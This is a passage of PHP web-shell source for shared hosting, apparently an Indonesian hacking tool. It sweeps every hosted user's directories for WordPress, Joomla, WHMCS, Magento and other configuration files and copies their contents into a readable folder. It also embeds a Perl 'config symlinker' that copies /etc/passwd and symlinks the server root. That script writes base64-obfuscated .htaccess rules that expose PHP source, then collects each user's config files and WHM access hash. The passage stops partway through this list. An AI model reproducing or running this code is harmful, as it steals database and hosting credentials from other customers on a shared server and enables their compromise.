  792.                         "$user_docroot/application/config/database.php" => "Ellislab",
  793.                         "$user_docroot/vb/includes/config.php" => "Vbulletin",
  794.                         "$user_docroot/includes/config.php" => "Vbulletin",
  795.                         "$user_docroot/forum/includes/config.php" => "Vbulletin",
  796.                         "$user_docroot/forums/includes/config.php" => "Vbulletin",
  797.                         "$user_docroot/cc/includes/config.php" => "Vbulletin",
  798.                         "$user_docroot/inc/config.php" => "MyBB",
  799.                         "$user_docroot/includes/configure.php" => "OsCommerce",
  800.                         "$user_docroot/shop/includes/configure.php" => "OsCommerce",
  801.                         "$user_docroot/os/includes/configure.php" => "OsCommerce",
  802.                         "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
  803.                         "$user_docroot/products/includes/configure.php" => "OsCommerce",
  804.                         "$user_docroot/cart/includes/configure.php" => "OsCommerce",
  805.                         "$user_docroot/inc/conf_global.php" => "IPB",
  806.                         "$user_docroot/wp-config.php" => "Wordpress",
  807.                         "$user_docroot/wp/test/wp-config.php" => "Wordpress",
  808.                         "$user_docroot/blog/wp-config.php" => "Wordpress",
  809.                         "$user_docroot/beta/wp-config.php" => "Wordpress",
  810.                         "$user_docroot/portal/wp-config.php" => "Wordpress",
  811.                         "$user_docroot/site/wp-config.php" => "Wordpress",
  812.                         "$user_docroot/wp/wp-config.php" => "Wordpress",
  813.                         "$user_docroot/WP/wp-config.php" => "Wordpress",
  814.                         "$user_docroot/news/wp-config.php" => "Wordpress",
  815.                         "$user_docroot/wordpress/wp-config.php" => "Wordpress",
  816.                         "$user_docroot/test/wp-config.php" => "Wordpress",
  817.                         "$user_docroot/demo/wp-config.php" => "Wordpress",
  818.                         "$user_docroot/home/wp-config.php" => "Wordpress",
  819.                         "$user_docroot/v1/wp-config.php" => "Wordpress",
  820.                         "$user_docroot/v2/wp-config.php" => "Wordpress",
  821.                         "$user_docroot/press/wp-config.php" => "Wordpress",
  822.                         "$user_docroot/new/wp-config.php" => "Wordpress",
  823.                         "$user_docroot/blogs/wp-config.php" => "Wordpress",
  824.                         "$user_docroot/configuration.php" => "Joomla",
  825.                         "$user_docroot/blog/configuration.php" => "Joomla",
  826.                         "$user_docroot/submitticket.php" => "^WHMCS",
  827.                         "$user_docroot/cms/configuration.php" => "Joomla",
  828.                         "$user_docroot/beta/configuration.php" => "Joomla",
  829.                         "$user_docroot/portal/configuration.php" => "Joomla",
  830.                         "$user_docroot/site/configuration.php" => "Joomla",
  831.                         "$user_docroot/main/configuration.php" => "Joomla",
  832.                         "$user_docroot/home/configuration.php" => "Joomla",
  833.                         "$user_docroot/demo/configuration.php" => "Joomla",
  834.                         "$user_docroot/test/configuration.php" => "Joomla",
  835.                         "$user_docroot/v1/configuration.php" => "Joomla",
  836.                         "$user_docroot/v2/configuration.php" => "Joomla",
  837.                         "$user_docroot/joomla/configuration.php" => "Joomla",
  838.                         "$user_docroot/new/configuration.php" => "Joomla",
  839.                         "$user_docroot/WHMCS/submitticket.php" => "WHMCS",
  840.                         "$user_docroot/whmcs1/submitticket.php" => "WHMCS",
  841.                         "$user_docroot/Whmcs/submitticket.php" => "WHMCS",
  842.                         "$user_docroot/whmcs/submitticket.php" => "WHMCS",
  843.                         "$user_docroot/whmcs/submitticket.php" => "WHMCS",
  844.                         "$user_docroot/WHMC/submitticket.php" => "WHMCS",
  845.                         "$user_docroot/Whmc/submitticket.php" => "WHMCS",
  846.                         "$user_docroot/whmc/submitticket.php" => "WHMCS",
  847.                         "$user_docroot/WHM/submitticket.php" => "WHMCS",
  848.                         "$user_docroot/Whm/submitticket.php" => "WHMCS",
  849.                         "$user_docroot/whm/submitticket.php" => "WHMCS",
  850.                         "$user_docroot/HOST/submitticket.php" => "WHMCS",
  851.                         "$user_docroot/Host/submitticket.php" => "WHMCS",
  852.                         "$user_docroot/host/submitticket.php" => "WHMCS",
  853.                         "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
  854.                         "$user_docroot/Supportes/submitticket.php" => "WHMCS",
  855.                         "$user_docroot/supportes/submitticket.php" => "WHMCS",
  856.                         "$user_docroot/domains/submitticket.php" => "WHMCS",
  857.                         "$user_docroot/domain/submitticket.php" => "WHMCS",
  858.                         "$user_docroot/Hosting/submitticket.php" => "WHMCS",
  859.                         "$user_docroot/HOSTING/submitticket.php" => "WHMCS",
  860.                         "$user_docroot/hosting/submitticket.php" => "WHMCS",
  861.                         "$user_docroot/CART/submitticket.php" => "WHMCS",
  862.                         "$user_docroot/Cart/submitticket.php" => "WHMCS",
  863.                         "$user_docroot/cart/submitticket.php" => "WHMCS",
  864.                         "$user_docroot/ORDER/submitticket.php" => "WHMCS",
  865.                         "$user_docroot/Order/submitticket.php" => "WHMCS",
  866.                         "$user_docroot/order/submitticket.php" => "WHMCS",
  867.                         "$user_docroot/CLIENT/submitticket.php" => "WHMCS",
  868.                         "$user_docroot/Client/submitticket.php" => "WHMCS",
  869.                         "$user_docroot/client/submitticket.php" => "WHMCS",
  870.                         "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
  871.                         "$user_docroot/Clientarea/submitticket.php" => "WHMCS",
  872.                         "$user_docroot/clientarea/submitticket.php" => "WHMCS",
  873.                         "$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
  874.                         "$user_docroot/Support/submitticket.php" => "WHMCS",
  875.                         "$user_docroot/support/submitticket.php" => "WHMCS",
  876.                         "$user_docroot/BILLING/submitticket.php" => "WHMCS",
  877.                         "$user_docroot/Billing/submitticket.php" => "WHMCS",
  878.                         "$user_docroot/billing/submitticket.php" => "WHMCS",
  879.                         "$user_docroot/BUY/submitticket.php" => "WHMCS",
  880.                         "$user_docroot/Buy/submitticket.php" => "WHMCS",
  881.                         "$user_docroot/buy/submitticket.php" => "WHMCS",
  882.                         "$user_docroot/MANAGE/submitticket.php" => "WHMCS",
  883.                         "$user_docroot/Manage/submitticket.php" => "WHMCS",
  884.                         "$user_docroot/manage/submitticket.php" => "WHMCS",
  885.                         "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  886.                         "$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
  887.                         "$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
  888.                         "$user_docroot/clientsupport/submitticket.php" => "WHMCS",
  889.                         "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
  890.                         "$user_docroot/Checkout/submitticket.php" => "WHMCS",
  891.                         "$user_docroot/checkout/submitticket.php" => "WHMCS",
  892.                         "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
  893.                         "$user_docroot/Billings/submitticket.php" => "WHMCS",
  894.                         "$user_docroot/billings/submitticket.php" => "WHMCS",
  895.                         "$user_docroot/BASKET/submitticket.php" => "WHMCS",
  896.                         "$user_docroot/Basket/submitticket.php" => "WHMCS",
  897.                         "$user_docroot/basket/submitticket.php" => "WHMCS",
  898.                         "$user_docroot/SECURE/submitticket.php" => "WHMCS",
  899.                         "$user_docroot/Secure/submitticket.php" => "WHMCS",
  900.                         "$user_docroot/secure/submitticket.php" => "WHMCS",
  901.                         "$user_docroot/SALES/submitticket.php" => "WHMCS",
  902.                         "$user_docroot/Sales/submitticket.php" => "WHMCS",
  903.                         "$user_docroot/sales/submitticket.php" => "WHMCS",
  904.                         "$user_docroot/BILL/submitticket.php" => "WHMCS",
  905.                         "$user_docroot/Bill/submitticket.php" => "WHMCS",
  906.                         "$user_docroot/bill/submitticket.php" => "WHMCS",
  907.                         "$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
  908.                         "$user_docroot/Purchase/submitticket.php" => "WHMCS",
  909.                         "$user_docroot/purchase/submitticket.php" => "WHMCS",
  910.                         "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
  911.                         "$user_docroot/Account/submitticket.php" => "WHMCS",
  912.                         "$user_docroot/account/submitticket.php" => "WHMCS",
  913.                         "$user_docroot/USER/submitticket.php" => "WHMCS",
  914.                         "$user_docroot/User/submitticket.php" => "WHMCS",
  915.                         "$user_docroot/user/submitticket.php" => "WHMCS",
  916.                         "$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
  917.                         "$user_docroot/Clients/submitticket.php" => "WHMCS",
  918.                         "$user_docroot/clients/submitticket.php" => "WHMCS",
  919.                         "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
  920.                         "$user_docroot/Billings/submitticket.php" => "WHMCS",
  921.                         "$user_docroot/billings/submitticket.php" => "WHMCS",
  922.                         "$user_docroot/MY/submitticket.php" => "WHMCS",
  923.                         "$user_docroot/My/submitticket.php" => "WHMCS",
  924.                         "$user_docroot/my/submitticket.php" => "WHMCS",
  925.                         "$user_docroot/secure/whm/submitticket.php" => "WHMCS",
  926.                         "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
  927.                         "$user_docroot/panel/submitticket.php" => "WHMCS",
  928.                         "$user_docroot/clientes/submitticket.php" => "WHMCS",
  929.                         "$user_docroot/cliente/submitticket.php" => "WHMCS",
  930.                         "$user_docroot/support/order/submitticket.php" => "WHMCS",
  931.                         "$user_docroot/bb-config.php" => "BoxBilling",
  932.                         "$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
  933.                         "$user_docroot/box/bb-config.php" => "BoxBilling",
  934.                         "$user_docroot/host/bb-config.php" => "BoxBilling",
  935.                         "$user_docroot/Host/bb-config.php" => "BoxBilling",
  936.                         "$user_docroot/supportes/bb-config.php" => "BoxBilling",
  937.                         "$user_docroot/support/bb-config.php" => "BoxBilling",
  938.                         "$user_docroot/hosting/bb-config.php" => "BoxBilling",
  939.                         "$user_docroot/cart/bb-config.php" => "BoxBilling",
  940.                         "$user_docroot/order/bb-config.php" => "BoxBilling",
  941.                         "$user_docroot/client/bb-config.php" => "BoxBilling",
  942.                         "$user_docroot/clients/bb-config.php" => "BoxBilling",
  943.                         "$user_docroot/cliente/bb-config.php" => "BoxBilling",
  944.                         "$user_docroot/clientes/bb-config.php" => "BoxBilling",
  945.                         "$user_docroot/billing/bb-config.php" => "BoxBilling",
  946.                         "$user_docroot/billings/bb-config.php" => "BoxBilling",
  947.                         "$user_docroot/my/bb-config.php" => "BoxBilling",
  948.                         "$user_docroot/secure/bb-config.php" => "BoxBilling",
  949.                         "$user_docroot/support/order/bb-config.php" => "BoxBilling",
  950.                         "$user_docroot/includes/dist-configure.php" => "Zencart",
  951.                         "$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
  952.                         "$user_docroot/products/includes/dist-configure.php" => "Zencart",
  953.                         "$user_docroot/cart/includes/dist-configure.php" => "Zencart",
  954.                         "$user_docroot/shop/includes/dist-configure.php" => "Zencart",
  955.                         "$user_docroot/includes/iso4217.php" => "Hostbills",
  956.                         "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
  957.                         "$user_docroot/host/includes/iso4217.php" => "Hostbills",
  958.                         "$user_docroot/Host/includes/iso4217.php" => "Hostbills",
  959.                         "$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
  960.                         "$user_docroot/support/includes/iso4217.php" => "Hostbills",
  961.                         "$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
  962.                         "$user_docroot/cart/includes/iso4217.php" => "Hostbills",
  963.                         "$user_docroot/order/includes/iso4217.php" => "Hostbills",
  964.                         "$user_docroot/client/includes/iso4217.php" => "Hostbills",
  965.                         "$user_docroot/clients/includes/iso4217.php" => "Hostbills",
  966.                         "$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
  967.                         "$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
  968.                         "$user_docroot/billing/includes/iso4217.php" => "Hostbills",
  969.                         "$user_docroot/billings/includes/iso4217.php" => "Hostbills",
  970.                         "$user_docroot/my/includes/iso4217.php" => "Hostbills",
  971.                         "$user_docroot/secure/includes/iso4217.php" => "Hostbills",
  972.                         "$user_docroot/support/order/includes/iso4217.php" => "Hostbills"
  973.  
  974.                     );
  975.                     foreach($getconfig as $config => $userconfig) {
  976.                         $get = file_get_contents($config);
  977.                         if($get == '') {
  978.                         }
  979.                         else {
  980.                             $fopen = fopen("idx_config/$user-$userconfig.txt", "w");
  981.                             fputs($fopen, $get);
  982.                         }
  983.                     }
  984.                 }
  985.             }
  986.         }
  987.         print "<div style='background: #ffffff; width: 100%; height: 100%'>";
  988.         print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_config/' frameborder='0' scrolling='yes'><iframe>";
  989.         print "</div>";
  990.     }
  991.     elseif($toolsname === "symlink") {
  992.         if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_sym'."));
  993.         if(!is_dir(path()."/idx_sym/")) {
  994.             $sym['code'] = "#!/usr/bin/perl -I/usr/local/bandmin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#		Name : Perl/CGI Config Symlinker (With Auto Bypass Symlink 404)
#		Version : 1.2
#		Created : 9 Mei 2017
#		Author : 0x1999
#		Thanks To : 0xIDiot , Indonesian Code Party , Jatim4u
#		More Info : http://0xDark.blogspot.com
#		Want to recode ? Don't forget my nick name  :)
#		http://facebook.com/melex.1d
#		
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

use File::Copy;
use strict;
use warnings;
use MIME::Base64;
copy("/etc/passwd","passwd.txt") ;
mkdir "idx_sym";
symlink("/","idx_sym/root");
my $filename = 'passwd.txt';
my $htaccess = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgDQpBZGRIYW5kbGVyIHRleHQvcGxhaW4gLnBocA0KU2F0aXNmeSBBbnkNCkluZGV4T3B0aW9ucyArQ2hhcnNldD1VVEYtOCArRmFuY3lJbmRleGluZyArSWdub3JlQ2FzZSArRm9sZGVyc0ZpcnN0ICtYSFRNTCArSFRNTFRhYmxlICtTdXBwcmVzc1J1bGVzICtTdXBwcmVzc0Rlc2NyaXB0aW9uICtOYW1lV2lkdGg9KiANCkFkZEljb24gJ2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBQkFBQUFBUUNBWUFBQUFmOC85aEFBQUFCSE5DU1ZRSUNBZ0lmQWhraUFBQUFBbHdTRmx6QUFBTjF3QUFEZGNCUWlpYmVBQUFBQmwwUlZoMFUyOW1kSGRoY21VQWQzZDNMbWx1YTNOallYQmxMbTl5WjV2dVBCb0FBQUZVU1VSQlZEaU5wWks5U2dOQkZJWFB2WE5uZGpjUm9wWDRVNGtXVnI1QUNoVTdIOEJTZkl0QUhrQjlDWHNyVzBHd0VRdFJ3VktNUnRBVThaY1lXYU5tTTJPeHF5eWlZWmRjR0lhWjRaNzdNZWVRY3c2REZBL1VEVUFBWUhIajhoT0FUajlvUlNlMloxZjJLalAxZmdMa25NUFM1bFcwVmk0cFpvcHZIWERXK0loT3I5OWdYVHprcjlxdlRCTXRyTmQ4QXNMVmNvbVpLRFA2MWtFTGloR0lKOVFCZ08yamRzSUUvSmI1T2FjR0ZBd0RRRWVNRU9abmgxRXFNQ2h0U0I4YTY0QlcyTU5oN1FWaWhDR0tjTkhzd21aMGxBa1lIeEY0UWhCUENLSVlSVTlsNjA1S21HQ0VJVVl6dENZTUJma0VqR1o0T2lId1JRRit2a1FHK3B0QUNJRlJFSlZQUUF2RmYrQnJqb3lRK0NaZnFxMTE4RFJGRWhqZWJiYmVsNmRHaXlUcWYrdlNya2FSUS8wdXRMN21IWGw5dnErZVAzVW5iaC9INWdES2lPRjY3WWViWTBkU0pjUkJtMHoyckZsMnlXcDhBVkRJVzMyZGE3cExBQUFBQUVsRlRrU3VRbUNDJyBeXkRJUkVDVE9SWV5eDQpEZWZhdWx0SWNvbiAnZGF0YTppbWFnZS9wbmc7YmFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFCQUFBQUFRQ0FZQUFBQWY4LzloQUFBQUFYTlNSMElBcnM0YzZRQUFBQVppUzBkRUFQOEEvd0Qvb0wybmt3QUFBQWx3U0ZsekFBQUxFd0FBQ3hNQkFKcWNHQUFBQUFkMFNVMUZCOW9KQmhjVEp2MkIyZDRBQUFKTVNVUkJWRGpMYlpPOVRoeFpFSVcvcWx2ZHRNMzhCTmdKUW1RZ0pHZCtBL01RQkx3R2ppd0gzbndka1NMdE8yeEVSRzVMcXhYUlNJUjJZRGZENEdrR00wUDNyYjRiOVBBejBsN3BTbFdsVzBmbm5Mb2xBSVBCNFBYaDRlRnVudWNBSUlMd2RFU2VaeUFpZm5wNit1OW9OTG8zZ00zTnpUZEhSKy8venZKTXpTeUpLS29kaUlnOEFYYXhlSXoxYkRaN014cU5mdGdTVVJEV3k3TFVuWjBkWW14QUZBVkVsSTZBRUN5Z0lzUVFzaXpMQk9BQkFET2pLQXBxaDd1N0dvQ1VXaXdZYmV0b1VIcnJQY3dDcW9GMktVZVhMekV6QnYwK3VRbVNITUVaOUY2U1pjcjZpNElzQk9hL2I3SFFNYUh0SUF3Z0xkSGFsREExZXYwZVFiU2pyRXJRd0pwcUY0ZUF4L2hvcUQxMzJtTWtKcmk1dVNPbEZoRWhwVVFJaW9qd2FtT0ROc2xqZlVXQ3FwTG5PYWFDU0tKdG5hQkNzWllqQWxsbVhJNHZhZW9hVlgwY2JTZGhtVVIzekFLdk5qWTZWaW9vMHRXemdFb25LYlcrS2tHV3QzVW50MENlR2ZKczlnK1VVMHJFR0hIL0h3L01qSDYvVCtQT2RGb1JOS0NoTTIyeG1PUGVzcGpQR1E2SHBOUTI3dDZzQUNEU05hbnlvbGpETEVkVmFGT0xlOFprVWpLNXVrcTN0NzlsUEM3L09EazVHYStZNk81TXF5bU53M1YxeTNoeXpmWDBocXZKTHliWEZkKytmMmQzZDBkbXMrcXZnNE9EejhmSHgwL0xzYmUzOTY0c1M3KzR1RWp1bnBxbVNlNmUzRDNONS9OMFdaYnRseTlmMDluWjJaL2IyOXYyZkxFZXZ2SzlxdjdjMnRvS2k4VWlpUWlxSGJtNnJpVzZhMTNmbit6djczK29xb3JoY0xnS1VGWFZQK2ZuNTIrTG9uajhJTEowUDhaSUNDRjkvUFRwQ2xocEJ2Z1BlbG9MOVU1NU5JQUFBQUFBU1VWT1JLNUNZSUk9Jw0KSW5kZXhJZ25vcmUgKi50eHQ0MDQNCkluZGV4U3R5bGVTaGVldCAnaHR0cDovL2V2ZW50LmluZG94cGxvaXQub3IuaWQvc3ltbGluay5jc3MnDQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9IF4uKjB4c3ltNDA0IFtOQ10NClJld3JpdGVSdWxlIFwudHh0JCAle1JFUVVFU1RfVVJJfTQwNCBbTCxSPTMwMi5OQ10=");
my $sym = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KSGVhZGVyTmFtZSAweDE5OTkudHh0DQpTYXRpc2Z5IEFueQ0KSW5kZXhPcHRpb25zIElnbm9yZUNhc2UgRmFuY3lJbmRleGluZyBGb2xkZXJzRmlyc3QgTmFtZVdpZHRoPSogRGVzY3JpcHRpb25XaWR0aD0qIFN1cHByZXNzSFRNTFByZWFtYmxlDQpJbmRleElnbm9yZSAqDQpJbmRleFN0eWxlU2hlZXQgJ2h0dHA6Ly9ldmVudC5pbmRveHBsb2l0Lm9yLmlkL3N5bWxpbmsuY3NzJw==");
open(my $fh1, '>', 'idx_sym/.htaccess');
print $fh1 "$htaccess";
close $fh1;
open(my $xx, '>', 'idx_sym/nemu.txt');
print $xx "$sym";
close $xx;
open(my $fh, '<:encoding(UTF-8)', $filename);
while (my $row = <$fh>) {
my @matches = $row =~ /(.*?):x:/g;
my $usernya = $1;
my @array = (
	{configdir => '/home/'.$usernya.'/.accesshash', type => 'WHM-accesshash' },
	{configdir => '/home/'.$usernya.'/public_html/config/koneksi.php', type => 'Lokomedia' },
	{configdir => '/home/'.$usernya.'/public_html/config/settings.inc.php', type => 'PrestaShop' },
	{configdir => '/home/'.$usernya.'/public_html/app/etc/local.xml', type => 'Magento' },
	{configdir => '/home/'.$usernya.'/public_html/admin/config.php', type => 'OpenCart' },
	{configdir => '/home/'.$usernya.'/public_html/application/config/database.php', type => 'Ellislab' },
	{configdir => '/home/'.$usernya.'/public_html/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blog/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/beta/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/portal/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/site/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/WP/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/news/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wordpress/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/demo/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/home/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v1/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v2/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/press/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/new/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blogs/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/blog/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/submitticket.php', type => '^WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cms/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/beta/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/portal/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/site/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/main/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/home/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/demo/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/test/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v1/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v2/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/joomla/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/new/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/WHMCS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs1/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHMC/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHM/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOST/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORTES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domains/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domain/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOSTING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CART/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ORDER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTAREA/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BUY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MANAGE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTSUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ClientSupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CHECKOUT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BASKET/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SECURE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SALES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILL/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/PURCHASE/submitticket.php', type => 'WHMCS' },
